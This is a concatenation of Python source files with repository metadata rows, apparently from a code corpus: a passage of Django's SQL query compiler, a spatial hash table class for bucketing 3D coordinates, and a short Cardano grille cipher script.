self.connection.ops.quote_name(alias),
))
else:
select_clone = select.relabeled_clone({select.alias: 'subquery'})
subselect, subparams = select_clone.as_sql(self, self.connection)
sub_selects.append(subselect)
sub_params.extend(subparams)
return 'SELECT %s FROM (%s) subquery' % (
', '.join(sub_selects),
' '.join(result),
), tuple(sub_params + params)
return ' '.join(result), tuple(params)
finally:
# Finally do cleanup - get rid of the joins we created above.
self.query.reset_refcounts(refcounts_before)
def get_default_columns(self, start_alias=None, opts=None, from_parent=None):
"""
Compute the default columns for selecting every field in the base
model. Will sometimes be called to pull in related models (e.g. via
select_related), in which case "opts" and "start_alias" will be given
to provide a starting point for the traversal.
Return a list of strings, quoted appropriately for use in SQL
directly, as well as a set of aliases used in the select statement (if
'as_pairs' is True, return a list of (alias, col_name) pairs instead
of strings as the first component and None as the second component).
"""
result = []
if opts is None:
opts = self.query.get_meta()
only_load = self.deferred_to_columns()
start_alias = start_alias or self.query.get_initial_alias()
# The 'seen_models' is used to optimize checking the needed parent
# alias for a given field. This also includes None -> start_alias to
# be used by local fields.
seen_models = {None: start_alias}
for field in opts.concrete_fields:
model = field.model._meta.concrete_model
# A proxy model will have a different model and concrete_model. We
# will assign None if the field belongs to this model.
if model == opts.model:
model = None
if from_parent and model is not None and issubclass(
from_parent._meta.concrete_model, model._meta.concrete_model):
# Avoid loading data for already loaded parents.
# We end up here in the case select_related() resolution
# proceeds from parent model to child model. In that case the
# parent model data is already present in the SELECT clause,
# and we want to avoid reloading the same data again.
continue
if field.model in only_load and field.attname not in only_load[field.model]:
continue
alias = self.query.join_parent_model(opts, model, start_alias,
seen_models)
column = field.get_col(alias)
result.append(column)
return result
def get_distinct(self):
"""
Return a quoted list of fields to use in DISTINCT ON part of the query.
This method can alter the tables in the query, and thus it must be
called before get_from_clause().
"""
result = []
params = []
opts = self.query.get_meta()
for name in self.query.distinct_fields:
parts = name.split(LOOKUP_SEP)
_, targets, alias, joins, path, _, transform_function = self._setup_joins(parts, opts, None)
targets, alias, _ = self.query.trim_joins(targets, joins, path)
for target in targets:
if name in self.query.annotation_select:
result.append(name)
else:
r, p = self.compile(transform_function(target, alias))
result.append(r)
params.append(p)
return result, params
def find_ordering_name(self, name, opts, alias=None, default_order='ASC',
already_seen=None):
"""
Return the table alias (the name might be ambiguous, the alias will
not be) and column name for ordering by the given 'name' parameter.
The 'name' is of the form 'field1__field2__...__fieldN'.
"""
name, order = get_order_dir(name, default_order)
descending = order == 'DESC'
pieces = name.split(LOOKUP_SEP)
field, targets, alias, joins, path, opts, transform_function = self._setup_joins(pieces, opts, alias)
# If we get to this point and the field is a relation to another model,
# append the default ordering for that model unless the attribute name
# of the field is specified.
if field.is_relation and opts.ordering and getattr(field, 'attname', None) != name:
# Firstly, avoid infinite loops.
already_seen = already_seen or set()
join_tuple = tuple(getattr(self.query.alias_map[j], 'join_cols', None) for j in joins)
if join_tuple in already_seen:
raise FieldError('Infinite loop caused by ordering.')
already_seen.add(join_tuple)
results = []
for item in opts.ordering:
results.extend(self.find_ordering_name(item, opts, alias,
order, already_seen))
return results
targets, alias, _ = self.query.trim_joins(targets, joins, path)
return [(OrderBy(transform_function(t, alias), descending=descending), False) for t in targets]
def _setup_joins(self, pieces, opts, alias):
"""
Helper method for get_order_by() and get_distinct().
get_ordering() and get_distinct() must produce same target columns on
same input, as the prefixes of get_ordering() and get_distinct() must
match. Executing SQL where this is not true is an error.
"""
alias = alias or self.query.get_initial_alias()
field, targets, opts, joins, path, transform_function = self.query.setup_joins(pieces, opts, alias)
alias = joins[-1]
return field, targets, alias, joins, path, opts, transform_function
def get_from_clause(self):
"""
Return a list of strings that are joined together to go after the
"FROM" part of the query, as well as a list any extra parameters that
need to be included. Subclasses, can override this to create a
from-clause via a "select".
This should only be called after any SQL construction methods that
might change the tables that are needed. This means the select columns,
ordering, and distinct must be done first.
"""
result = []
params = []
for alias in tuple(self.query.alias_map):
if not self.query.alias_refcount[alias]:
continue
try:
from_clause = self.query.alias_map[alias]
except KeyError:
# Extra tables can end up in self.tables, but not in the
# alias_map if they aren't in a join. That's OK. We skip them.
continue
clause_sql, clause_params = self.compile(from_clause)
result.append(clause_sql)
params.extend(clause_params)
for t in self.query.extra_tables:
alias, _ = self.query.table_alias(t)
# Only add the alias if it's not already present (the table_alias()
# call increments the refcount, so an alias refcount of one means
# this is the only reference).
if alias not in self.query.alias_map or self.query.alias_refcount[alias] == 1:
result.append(', %s' % self.quote_name_unless_alias(alias))
return result, params
def get_related_selections(self, select, opts=None, root_alias=None, cur_depth=1,
requested=None, restricted=None):
"""
Fill in the information needed for a select_related query. The current
depth is measured as the number of connections away from the root model
(for example, cur_depth=1 means we are looking at models with direct
connections to the root model).
"""
def _get_field_choices():
direct_choices = (f.name for f in opts.fields if f.is_relation)
reverse_choices = (
f.field.related_query_name()
for f in opts.related_objects if f.field.unique
)
return chain(direct_choices, reverse_choices, self.query._filtered_relations)
related_klass_infos = []
if not restricted and cur_depth > self.query.max_depth:
# We've recursed far enough; bail out.
return related_klass_infos
if not opts:
opts = self.query.get_meta()
root_alias = self.query.get_initial_alias()
only_load = self.query.get_loaded_field_names()
# Setup for the case when only particular related fields should be
# included in the related selection.
fields_found = set()
if requested is None:
restricted = isinstance(self.query.select_related, dict)
if restricted:
requested = self.query.select_related
def get_related_klass_infos(klass_info, related_klass_infos):
klass_info['related_klass_infos'] = related_klass_infos
for f in opts.fields:
field_model = f.model._meta.concrete_model
fields_found.add(f.name)
if restricted:
next = requested.get(f.name, {})
if not f.is_relation:
# If a non-related field is used like a relation,
# or if a single non-relational field is given.
if next or f.name in requested:
raise FieldError(
"Non-relational field given in select_related: '%s'. "
"Choices are: %s" % (
f.name,
", ".join(_get_field_choices()) or '(none)',
)
)
else:
next = False
if not select_related_descend(f, restricted, requested,
only_load.get(field_model)):
continue
klass_info = {
'model': f.remote_field.model,
'field': f,
'reverse': False,
'local_setter': f.set_cached_value,
'remote_setter': f.remote_field.set_cached_value if f.unique else lambda x, y: None,
'from_parent': False,
}
related_klass_infos.append(klass_info)
select_fields = []
_, _, _, joins, _, _ = self.query.setup_joins(
[f.name], opts, root_alias)
alias = joins[-1]
columns = self.get_default_columns(start_alias=alias, opts=f.remote_field.model._meta)
for col in columns:
select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next_klass_infos = self.get_related_selections(
select, f.remote_field.model._meta, alias, cur_depth + 1, next, restricted)
get_related_klass_infos(klass_info, next_klass_infos)
if restricted:
related_fields = [
(o.field, o.related_model)
for o in opts.related_objects
if o.field.unique and not o.many_to_many
]
for f, model in related_fields:
if not select_related_descend(f, restricted, requested,
only_load.get(model), reverse=True):
continue
related_field_name = f.related_query_name()
fields_found.add(related_field_name)
join_info = self.query.setup_joins([related_field_name], opts, root_alias)
alias = join_info.joins[-1]
from_parent = issubclass(model, opts.model) and model is not opts.model
klass_info = {
'model': model,
'field': f,
'reverse': True,
'local_setter': f.remote_field.set_cached_value,
'remote_setter': f.set_cached_value,
'from_parent': from_parent,
}
related_klass_infos.append(klass_info)
select_fields = []
columns = self.get_default_columns(
start_alias=alias, opts=model._meta, from_parent=opts.model)
for col in columns:
select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next = requested.get(f.related_query_name(), {})
next_klass_infos = self.get_related_selections(
select, model._meta, alias, cur_depth + 1,
next, restricted)
get_related_klass_infos(klass_info, next_klass_infos)
fields_not_found = set(requested).difference(fields_found)
for name in list(requested):
# Filtered relations work only on the topmost level.
if cur_depth > 1:
break
if name in self.query._filtered_relations:
fields_found.add(name)
f, _, join_opts, joins, _, _ = self.query.setup_joins([name], opts, root_alias)
model = join_opts.model
alias = joins[-1]
from_parent = issubclass(model, opts.model) and model is not opts.model
def local_setter(obj, from_obj):
f.remote_field.set_cached_value(from_obj, obj)
def remote_setter(obj, from_obj):
setattr(from_obj, name, obj)
klass_info = {
'model': model,
'field': f,
'reverse': True,
'local_setter': local_setter,
'remote_setter': remote_setter,
'from_parent': from_parent,
}
related_klass_infos.append(klass_info)
select_fields = []
columns = self.get_default_columns(
start_alias=alias, opts=model._meta,
from_parent=opts.model,
)
for col in columns:
select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next_requested = requested.get(name, {})
next_klass_infos = self.get_related_selections(
select, opts=model._meta, root_alias=alias,
cur_depth=cur_depth + 1, requested=next_requested,
restricted=restricted,
)
get_related_klass_infos(klass_info, next_klass_infos)
fields_not_found = set(requested).difference(fields_found)
if fields_not_found:
invalid_fields = ("'%s'" % s for s in fields_not_found)
raise FieldError(
'Invalid field name(s) given in select_related: %s. '
'Choices are: %s' % (
', '.join(invalid_fields),
', '.join(_get_field_choices()) or '(none)',
)
)
return related_klass_infos
def get_select_for_update_of_arguments(self):
"""
Return a quoted list of arguments for the SELECT FOR UPDATE OF part of
the query.
"""
def _get_field_choices():
"""Yield all allowed field paths in breadth-first search order."""
queue = collections.deque([(None, self.klass_info)])
while queue:
parent_path, klass_info = queue.popleft()
if parent_path is None:
path = []
yield 'self'
else:
field = klass_info['field']
if klass_info['reverse']:
field = field.remote_field
path = parent_path + [field.name]
yield LOOKUP_SEP.join(path)
queue.extend(
(path, klass_info)
for klass_info in klass_info.get('related_klass_infos', [])
)
result = []
invalid_names = []
for name in self.query.select_for_update_of:
parts = [] if name == 'self' else name.split(LOOKUP_SEP)
klass_info = self.klass_info
for part in parts:
for related_klass_info in klass_info.get('related_klass_infos', []):
field = related_klass_info['field']
if related_klass_info['reverse']:
field = field.remote_field
if field.name == part:
klass_info = related_klass_info
break
else:
klass_info = None
break
if klass_info is None:
invalid_names.append(name)
continue
select_index = klass_info['select_fields'][0]
col = self.select[select_index][0]
if self.connection.features.select_for_update_of_column:
result.append(self.compile(col)[0])
else:
result.append(self.quote_name_unless_alias(col.alias))
if invalid_names:
raise FieldError(
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: %s.' % (
', '.join(invalid_names),
', '.join(_get_field_choices()),
)
)
return result
def deferred_to_columns(self):
"""
Convert the self.deferred_loading data structure to mapping of table
names to sets of column names which are to be loaded. Return the
dictionary.
"""
columns = {}
self.query.deferred_to_data(columns, self.query.get_loaded_field_names_cb)
return columns
def get_converters(self, expressions):
converters = {}
for i, expression in enumerate(expressions):
if expression:
backend_converters = self.connection.ops.get_db_converters(expression)
field_converters = expression.get_db_converters(self.connection)
if backend_converters or field_converters:
convs = []
for conv in (backend_converters + field_converters):
if func_supports_parameter(conv, 'context'):
warnings.warn(
'Remove the context parameter from %s.%s(). Support for it '
'will be removed in Django 3.0.' % (
conv.__self__.__class__.__name__,
conv.__name__,
),
RemovedInDjango30Warning,
)
conv = functools.partial(conv, context={})
convs.append(conv)
converters[i] = (convs, expression)
return converters
def apply_converters(self, rows, converters):
connection = self.connection
converters = list(converters.items())
for row in map(list, rows):
for pos, (convs, expression) in converters:
value = row[pos]
for converter in convs:
value = converter(value, expression, connection)
row[pos] = value
yield row
def results_iter(self, results=None, tuple_expected=False, chunked_fetch=False,
chunk_size=GET_ITERATOR_CHUNK_SIZE):
"""Return an iterator over the results from executing this query."""
if results is None:
results = self.execute_sql(MULTI, chunked_fetch=chunked_fetch, chunk_size=chunk_size)
fields = [s[0] for s in self.select[0:self.col_count]]
converters = self.get_converters(fields)
rows = chain.from_iterable(results)
if converters:
rows = self.apply_converters(rows, converters)
if tuple_expected:
rows = map(tuple, rows)
return rows
def has_results(self):
"""
Backends (e.g. NoSQL) can override this in order to use optimized
versions of "query has any results."
"""
# This is always executed on a query clone, so we can modify self.query
self.query.add_extra({'a': 1}, None, None, None, None, None)
self.query.set_extra_mask(['a'])
return bool(self.execute_sql(SINGLE))
def execute_sql(self, result_type=MULTI, chunked_fetch=False, chunk_size=GET_ITERATOR_CHUNK_SIZE):
"""
Run the query against the database and return the result(s). The
return value is a single data item if result_type is SINGLE, or an
iterator over the results if the result_type is MULTI.
result_type is either MULTI (use fetchmany() to retrieve all rows),
SINGLE (only retrieve a single row), or None. In this last case, the
cursor is returned if any query is executed, since it's used by
subclasses such as InsertQuery). It's possible, however, that no query
is needed, as the filters describe an empty set. In that case, None is
returned, to avoid any unnecessary database interaction.
"""
result_type = result_type or NO_RESULTS
try:
sql, params = self.as_sql()
if not sql:
raise EmptyResultSet
except EmptyResultSet:
if result_type == MULTI:
return iter([])
else:
return
if chunked_fetch:
cursor = self.connection.chunked_cursor()
else:
cursor = self.connection.cursor()
try:
cursor.execute(sql, params)
except Exception:
# Might fail for server-side cursors (e.g. connection closed)
cursor.close()
raise
if result_type == CURSOR:
# Give the caller the cursor to process and close.
return cursor
if result_type == SINGLE:
try:
val = cursor.fetchone()
if val:
return val[0:self.col_count]
return val
finally:
# done with the cursor
cursor.close()
if result_type == NO_RESULTS:
cursor.close()
return
result = cursor_iter(
cursor, self.connection.features.empty_fetchmany_value,
self.col_count if self.has_extra_select else None,
chunk_size,
)
if not chunked_fetch and not self.connection.features.can_use_chunked_reads:
try:
# If we are using non-chunked reads, we return the same data
# structure as normally, but ensure it is all read into memory
# before going any further. Use chunked_fetch if requested.
return list(result)
finally:
# done with the cursor
cursor.close()
return result
def as_subquery_condition(self, alias, columns, compiler):
qn = compiler.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
for index, select_col in enumerate(self.query.select):
lhs_sql, lhs_params = self.compile(select_col)
rhs = '%s.%s' % (qn(alias), qn2(columns[index]))
self.query.where.add(
QueryWrapper('%s = %s' % (lhs_sql, rhs), lhs_params), 'AND')
sql, params = self.as_sql()
return 'EXISTS (%s)' % sql, params
def explain_query(self):
result = list(self.execute_sql())
# Some backends return 1 item tuples with strings, and others return
# tuples with integers and strings. Flatten them out into strings.
for row in result[0]:
if not isinstance(row, str):
yield ' '.join(str(c) for c in row)
else:
yield row
class SQLInsertCompiler(SQLCompiler):
return_id = False
def field_as_sql(self, field, val):
"""
Take a field and a value intended to be saved on that field, and
return placeholder SQL and accompanying params. Check for raw values,
expressions, and fields with get_placeholder() defined in that order.
When field is None, consider the value raw and use it as the
placeholder, with no corresponding parameters returned.
"""
if field is None:
# A field value of None means the value is raw.
sql, params = val, []
elif hasattr(val, 'as_sql'):
# This is an expression, let's compile it.
sql, params = self.compile(val)
elif hasattr(field, 'get_placeholder'):
# Some fields (e.g. geo fields) need special munging before
# they can be inserted.
sql, params = field.get_placeholder(val, self, self.connection), [val]
else:
# Return the common case for the placeholder
sql, params = '%s', [val]
# The following hook is only used by Oracle Spatial, which sometimes
# needs to yield 'NULL' and [] as its placeholder and params instead
# of '%s' and [None]. The 'NULL' placeholder is produced earlier by
# OracleOperations.get_geom_placeholder(). The following line removes
# the corresponding None parameter. See ticket #10888.
params = self.connection.ops.modify_insert_params(sql, params)
return sql, params
def prepare_value(self, field, value):
"""
Prepare a value to be used in a query by resolving it if it is an
expression and otherwise calling the field's get_db_prep_save().
"""
if hasattr(value, 'resolve_expression'):
value = value.resolve_expression(self.query, allow_joins=False, for_save=True)
# Don't allow values containing Col expressions. They refer to
# existing columns on a row, but in the case of insert the row
# doesn't exist yet.
if value.contains_column_references:
raise ValueError(
'Failed to insert expression "%s" on %s. F() expressions '
'can only be used to update, not to insert.' % (value, field)
)
if value.contains_aggregate:
raise FieldError("Aggregate functions are not allowed in this query")
if value.contains_over_clause:
raise FieldError('Window expressions are not allowed in this query.')
else:
value = field.get_db_prep_save(value, connection=self.connection)
return value
def pre_save_val(self, field, obj):
"""
Get the given field's value off the given obj. pre_save() is used for
things like auto_now on DateTimeField. Skip it if this is a raw query.
"""
if self.query.raw:
return getattr(obj, field.attname)
return field.pre_save(obj, add=True)
def assemble_as_sql(self, fields, value_rows):
"""
Take a sequence of N fields and a sequence of M rows of values, and
generate placeholder SQL and parameters for each field and value.
Return a pair containing:
* a sequence of M rows of N SQL placeholder strings, and
* a sequence of M rows of corresponding parameter values.
Each placeholder string may contain any number of '%s' interpolation
strings, and each parameter row will contain exactly as many params
as the total number of '%s's in the corresponding placeholder row.
"""
if not value_rows:
return [], []
# list of (sql, [params]) tuples for each object to be saved
# Shape: [n_objs][n_fields][2]
rows_of_fields_as_sql = (
(self.field_as_sql(field, v) for field, v in zip(fields, row))
for row in value_rows
)
# tuple like ([sqls], [[params]s]) for each object to be saved
# Shape: [n_objs][2][n_fields]
sql_and_param_pair_rows = (zip(*row) for row in rows_of_fields_as_sql)
# Extract separate lists for placeholders and params.
# Each of these has shape [n_objs][n_fields]
placeholder_rows, param_rows = zip(*sql_and_param_pair_rows)
# Params for each field are still lists, and need to be flattened.
param_rows = [[p for ps in row for p in ps] for row in param_rows]
return placeholder_rows, param_rows
def as_sql(self):
# We don't need quote_name_unless_alias() here, since these are all
# going to be column names (so we can avoid the extra overhead).
qn = self.connection.ops.quote_name
opts = self.query.get_meta()
result = ['INSERT INTO %s' % qn(opts.db_table)]
fields = self.query.fields or [opts.pk]
result.append('(%s)' % ', '.join(qn(f.column) for f in fields))
if self.query.fields:
value_rows = [
[self.prepare_value(field, self.pre_save_val(field, obj)) for field in fields]
for obj in self.query.objs
]
else:
# An empty object.
value_rows = [[self.connection.ops.pk_default_value()] for _ in self.query.objs]
fields = [None]
# Currently the backends just accept values when generating bulk
# queries and generate their own placeholders. Doing that isn't
# necessary and it should be possible to use placeholders and
# expressions in bulk inserts too.
can_bulk = (not self.return_id and self.connection.features.has_bulk_insert)
placeholder_rows, param_rows = self.assemble_as_sql(fields, value_rows)
if self.return_id and self.connection.features.can_return_id_from_insert:
if self.connection.features.can_return_ids_from_bulk_insert:
result.append(self.connection.ops.bulk_insert_sql(fields, placeholder_rows))
params = param_rows
else:
result.append("VALUES (%s)" % ", ".join(placeholder_rows[0]))
params = [param_rows[0]]
col = "%s.%s" % (qn(opts.db_table), qn(opts.pk.column))
r_fmt, r_params = self.connection.ops.return_insert_id()
# Skip empty r_fmt to allow subclasses to customize behavior for
# 3rd party backends. Refs #19096.
if r_fmt:
result.append(r_fmt % col)
params += [r_params]
return [(" ".join(result), tuple(chain.from_iterable(params)))]
if can_bulk:
result.append(self.connection.ops.bulk_insert_sql(fields, placeholder_rows))
return [(" ".join(result), tuple(p for ps in param_rows for p in ps))]
else:
return [
(" ".join(result + ["VALUES (%s)" % ", ".join(p)]), vals)
for p, vals in zip(placeholder_rows, param_rows)
]
def execute_sql(self, return_id=False):
assert not (
return_id and len(self.query.objs) != 1 and
not self.connection.features.can_return_ids_from_bulk_insert
)
self.return_id = return_id
with self.connection.cursor() as cursor:
for sql, params in self.as_sql():
cursor.execute(sql, params)
if not return_id:
return
if self.connection.features.can_return_ids_from_bulk_insert and len(self.query.objs) > 1:
return self.connection.ops.fetch_returned_insert_ids(cursor)
if self.connection.features.can_return_id_from_insert:
assert len(self.query.objs) == 1
return self.connection.ops.fetch_returned_insert_id(cursor)
return self.connection.ops.last_insert_id(
cursor, self.query.get_meta().db_table, self.query.get_meta().pk.column
)
class SQLDeleteCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
assert len([t for t in self.query.alias_map if self.query.alias_refcount[t] > 0]) == 1, \
"Can only delete from one table at a time."
qn = self.quote_name_unless_alias
result = ['DELETE FROM %s' % qn(self.query.base_table)]
where, params = self.compile(self.query.where)
if where:
result.append('WHERE %s' % where)
return ' '.join(result), tuple(params)
class SQLUpdateCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
self.pre_sql_setup()
if not self.query.values:
return '', ()
qn = self.quote_name_unless_alias
values, update_params = [], []
for field, model, val in self.query.values:
if hasattr(val, 'resolve_expression'):
val = val.resolve_expression(self.query, allow_joins=False, for_save=True)
if val.contains_aggregate:
raise FieldError("Aggregate functions are not allowed in this query")
if val.contains_over_clause:
raise FieldError('Window expressions are not allowed in this query.')
elif hasattr(val, 'prepare_database_save'):
if field.remote_field:
val = field.get_db_prep_save(
val.prepare_database_save(field),
connection=self.connection,
)
else:
raise TypeError(
"Tried to update field %s with a model instance, %r. "
"Use a value compatible with %s."
% (field, val, field.__class__.__name__)
)
else:
val = field.get_db_prep_save(val, connection=self.connection)
# Getting the placeholder for the field.
if hasattr(field, 'get_placeholder'):
placeholder = field.get_placeholder(val, self, self.connection)
else:
placeholder = '%s'
name = field.column
if hasattr(val, 'as_sql'):
sql, params = self.compile(val)
values.append('%s = %s' % (qn(name), placeholder % sql))
update_params.extend(params)
elif val is not None:
values.append('%s = %s' % (qn(name), placeholder))
update_params.append(val)
else:
values.append('%s = NULL' % qn(name))
table = self.query.base_table
result = [
'UPDATE %s SET' % qn(table),
', '.join(values),
]
where, params = self.compile(self.query.where)
if where:
result.append('WHERE %s' % where)
return ' '.join(result), tuple(update_params + params)
def execute_sql(self, result_type):
"""
Execute the specified update. Return the number of rows affected by
the primary update query. The "primary update query" is the first
non-empty query that is executed. Row counts for any subsequent,
related queries are not available.
"""
cursor = super().execute_sql(result_type)
try:
rows = cursor.rowcount if cursor else 0
is_empty = cursor is None
finally:
if cursor:
cursor.close()
for query in self.query.get_related_updates():
aux_rows = query.get_compiler(self.using).execute_sql(result_type)
if is_empty and aux_rows:
rows = aux_rows
is_empty = False
return rows
def pre_sql_setup(self):
"""
If the update depends on results from other tables, munge the "where"
conditions to match the format required for (portable) SQL updates.
If multiple updates are required, pull out the id values to update at
this point so that they don't change as a result of the progressive
updates.
"""
refcounts_before = self.query.alias_refcount.copy()
# Ensure base table is in the query
self.query.get_initial_alias()
count = self.query.count_active_tables()
if not self.query.related_updates and count == 1:
return
query = self.query.chain(klass=Query)
query.select_related = False
query.clear_ordering(True)
query._extra = {}
query.select = []
query.add_fields([query.get_meta().pk.name])
super().pre_sql_setup()
must_pre_select = count > 1 and not self.connection.features.update_can_self_select
# Now we adjust the current query: reset the where clause and get rid
# of all the tables we don't need (since they're in the sub-select).
self.query.where = self.query.where_class()
if self.query.related_updates or must_pre_select:
# Either we're using the idents in multiple update queries (so
# don't want them to change), or the db backend doesn't support
# selecting from the updating table (e.g. MySQL).
idents = []
for rows in query.get_compiler(self.using).execute_sql(MULTI):
idents.extend(r[0] for r in rows)
self.query.add_filter(('pk__in', idents))
self.query.related_ids = idents
else:
# The fast path. Filters and updates in one query.
self.query.add_filter(('pk__in', query))
self.query.reset_refcounts(refcounts_before)
class SQLAggregateCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
sql, params = [], []
for annotation in self.query.annotation_select.values():
ann_sql, ann_params = self.compile(annotation, select_format=FORCE)
sql.append(ann_sql)
params.extend(ann_params)
self.col_count = len(self.query.annotation_select)
sql = ', '.join(sql)
params = tuple(params)
sql = 'SELECT %s FROM (%s) subquery' % (sql, self.query.subquery)
params = params + self.query.sub_params
return sql, params
def cursor_iter(cursor, sentinel, col_count, itersize):
"""
Yield blocks of rows from a cursor and ensure the cursor is closed when
done.
"""
try:
for rows in iter((lambda: cursor.fetchmany(itersize)), sentinel):
yield rows if col_count is None else [r[:col_count] for r in rows]
finally:
cursor.close()
|
[
"rizwansoaib@gmail.com"
] |
rizwansoaib@gmail.com
|
00fe1a578edc91b4d4734fcc27e0575cc817ea1f
|
eef7c5e1ece154796b8c0b8a772cc172de1cba50
|
/hashTable.py
|
546a9c50e5c09441eff558180435dd68053d849b
|
[] |
no_license
|
NILOIDE/Coordinate_HashTable
|
957fdc2091daad47b39e591910ce880b7bd7f16c
|
5e761eefac10cec875b167df1903cd07129899d3
|
refs/heads/master
| 2020-06-15T23:28:31.299003
| 2019-07-05T14:37:58
| 2019-07-05T14:37:58
| 195,420,941
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,801
|
py
|
import numpy as np
class SpatialHashTable(object):
"""
Hash table used to split coordinate system into buckets. Objects can be assigned to all buckets
that overlap with the provided volume. A hash table is useful in cases where it becomes
inefficient to search through all items in the coordinate system. Assigning objects to buckets
allows for a selected retrieval of neighboring objects.
Written by: Nil Stolt Ansó, 05/07/2019
"""
def __init__(self, dims, bucket_size):
self.dims = dims
self.n_dims = dims.shape[0]
self.buckets_per_dim = np.ceil(dims / bucket_size).astype(np.int32)
self.bucket_size = bucket_size # Assuming buckets have equally sized sides
self.n_buckets = int(np.prod(self.buckets_per_dim))
self.buckets = {}
self.clear_buckets()
def get_nearby_objects(self, pos, radius):
"""
Given a position and radius, retrieve all objects in the overlapping buckets.
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return: Objects in buckets overlapping with given volume.
"""
cell_ids = self.get_ids_for_volume(pos, radius)
return self.get_objects_from_buckets(cell_ids)
def get_ids_for_volume(self, pos, radius):
"""
Retrieve the IDs of all buckets overlapping with the volume with the given center position
and given radius.
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return: IDs of buckets overlapping volume.
"""
ids = set()
lowest_pos = np.max((pos - radius, np.zeros((self.n_dims,))), axis=0)
lowest_bucket_lower_bound = (lowest_pos - lowest_pos % self.bucket_size).astype(np.int32)
highest_bucket_upper_bound = (np.min((self.dims, pos + radius + 1.0), axis=0)).astype(np.int32)
for x in range(lowest_bucket_lower_bound[0], highest_bucket_upper_bound[0], self.bucket_size):
for y in range(lowest_bucket_lower_bound[1], highest_bucket_upper_bound[1], self.bucket_size):
for z in range(lowest_bucket_lower_bound[2], highest_bucket_upper_bound[2], self.bucket_size):
ids.add(self.get_id(x, y, z))
return ids
def get_id(self, x, y, z):
"""
Get bucket ID containing the given Cartesian coordinate.
:param x:
:param y:
:param z:
:return:
"""
return x // self.bucket_size + y // self.bucket_size * self.buckets_per_dim[0] + \
z // self.bucket_size * self.buckets_per_dim[0] * self.buckets_per_dim[1]
def get_objects_from_buckets(self, ids):
"""
Given the IDs of buckets, return the union of every set obtained from each individual bucket.
:param ids: Indices of buckets.
:return: Union of objects found in those buckets.
"""
objects = set()
for i in ids:
objects = objects.union(self.buckets[i])
return objects
def clear_buckets(self):
"""
Remove all objects from all buckets in the hash table.
:return:
"""
for idx in range(self.n_buckets):
self.buckets[idx] = set()
def insert_object(self, obj, pos, radius):
"""
Insert an object into all buckets that overlap with the volume with center 'pos' and
radius 'radius'
:param obj: Object to be inserted into buckets
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return:
"""
idxs = self.get_ids_for_volume(pos, radius)
for idx in idxs:
self.buckets[idx].add(obj)
def insert_objects(self, object_structure):
"""
Insert a structure of objects into hash table.
:param object_structure: Data structure where each row is of form (object, position, radius)
:return:
"""
for (obj, pos, radius) in object_structure:
self.insert_object(obj, pos, radius)
def get_dims(self):
"""
Get dimensions of hash table in terms of the coordinate system.
:return:
"""
return self.dims
def get_buckets_per_dim(self):
"""
Get how many buckets lay in each dimension.
:return: Tuple of number of buckets per dimension
"""
return self.buckets_per_dim
def get_buckets(self):
"""
Get all buckets.
:return:
"""
return self.buckets
def get_bucket_content(self, i):
"""
Get all objects in bucket of the given ID.
:param i: ID of the bucket
:return: Objects in the bucket with given ID.
"""
return self.buckets[i]
def get_bucket_center(self, i):
"""
Get the center coordinate (in terms of coordinate system) of bucket with given ID.
:param i: Index of bucket.
:return: Center coordinate of bucket.
"""
center = np.empty((self.n_dims,))
center[0] = i % self.dims[0] * self.bucket_size + self.bucket_size / 2
for d in range(1, self.n_dims):
center[d] = i // np.prod(self.dims[:d]) * self.bucket_size + self.bucket_size / 2
return center
def remove_object(self, obj, pos, radius):
"""
Remove object from all buckets overlapping with volume with center 'pos' and
radius 'radius'.
:param obj: Object to be inserted into buckets
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return:
"""
idxs = self.get_ids_for_volume(pos, radius)
for idx in idxs:
self.buckets[idx].remove(obj)
|
[
"noreply@github.com"
] |
NILOIDE.noreply@github.com
|
9d7a71d485c1957b6370b2641222562691b42037
|
3f40cd227393a1e9c1e76d7da3c9aaefe0581279
|
/venv/main.py
|
35680094676b7cbe1011d7743b8c5b27172918f8
|
[] |
no_license
|
ponikka/Cardano
|
5df4075a98abc1f3360bc9ce2b06b3f072b41f74
|
01c0c47d99a4649f2ab23321f8be78e0f16b900f
|
refs/heads/master
| 2021-02-09T11:47:36.879496
| 2020-03-02T08:16:12
| 2020-03-02T08:16:12
| 244,184,774
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,273
|
py
|
from tabulate import tabulate
from random import choice
from string import ascii_uppercase
from math import sqrt, ceil
alphabet = list(ascii_uppercase)
word = input('Enter the phrase\n').upper()
side = ceil(sqrt(len(word)))
if side % 2 != 0:
side = side + 1
square = []
square = [[0] * side for i in range(side)]
for i in range(side): # create the chiper key
for j in range(side // 2):
square[i][j] = 1
print('The KEY:')
print(tabulate(square, tablefmt='grid'))
count = 0
for i in range(side // 2):
for j in range(side):
if square[i][j] == 1 and len(word) > count:
square[i][j] = word[count]
square[i][side - j - 1] = word[count + (side//2)*(side//2)]
count = count + 1
count = count + count
for i in range(side // 2, side):
for j in range(side):
if square[i][j] == 1 and len(word) > count:
square[i][j] = word[count]
if len(word) > count + side:
square[i][side - j - 1] = word[count + (side//2)*(side//2)]
count = count + 1
print("Final table:")
for i in range(side):
for j in range(side):
if square[i][j] == 1 or square[i][j] == 0:
square[i][j] = choice(alphabet)
print(tabulate(square, tablefmt='grid'))
|
[
"andreev_9000@mail.ru"
] |
andreev_9000@mail.ru
|
1b5849466318aa075976375e01fa22fddd690edc
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_08_01/operations/_network_interface_load_balancers_operations.py
|
e42bd6eccf89e6b11dbf117b8ae8f3bcc1bcf2ca
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
